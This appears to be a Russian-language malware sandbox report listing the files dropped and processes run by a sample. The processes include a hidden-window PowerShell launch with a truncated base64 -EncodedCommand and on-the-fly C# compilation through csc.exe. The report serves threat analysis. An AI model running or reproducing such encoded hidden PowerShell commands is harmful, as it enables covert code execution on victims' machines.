Техническая информация
- %TEMP%\content\4792-1684-wscript.exe-15-51-28-165.dump
- %TEMP%\ss4gsf4k\ss4gsf4k.0.cs
- %TEMP%\ss4gsf4k\ss4gsf4k.cmdline
- %TEMP%\ss4gsf4k\ss4gsf4k.out
- %TEMP%\ss4gsf4k\cscfcc9e9f4410d46e9b6ecf93f2cee7fec.tmp
- %TEMP%\res7b08.tmp
- %TEMP%\ss4gsf4k\ss4gsf4k.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBHAHkAcgBhAHQAbwByACAASAB5AGEAbABvACAAQQBuAHMAZwBlACAAUgBlAHMAdABpAHIAcgBlAGQAIABQAGkAYwBrAGEAeABlACAAZABpAHMAaQBuAGMAIABUAGIAcwBwAHQAbwByACAARABlAHYAaQBlAHIAZQBuAGQAIABDAG8A...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\ss4gsf4k\ss4gsf4k.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7B08.tmp" "%TEMP%\ss4gsf4k\CSCFCC9E9F4410D46E9B6ECF93F2CEE7FEC.TMP"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBHAHkAcgBhAHQAbwByACAASAB5AGEAbABvACAAQQBuAHMAZwBlACAAUgBlAHMAdABpAHIAcgBlAGQAIABQAGkAYwBrAGEAeABlACAAZABpAHMAaQBuAGMAIABUAGIAcwBwAHQAbwByACAARABlAHYAaQBlAHIAZQBuAGQAIABDAG8A...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\ss4gsf4k\ss4gsf4k.cmdline"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7B08.tmp" "%TEMP%\ss4gsf4k\CSCFCC9E9F4410D46E9B6ECF93F2CEE7FEC.TMP"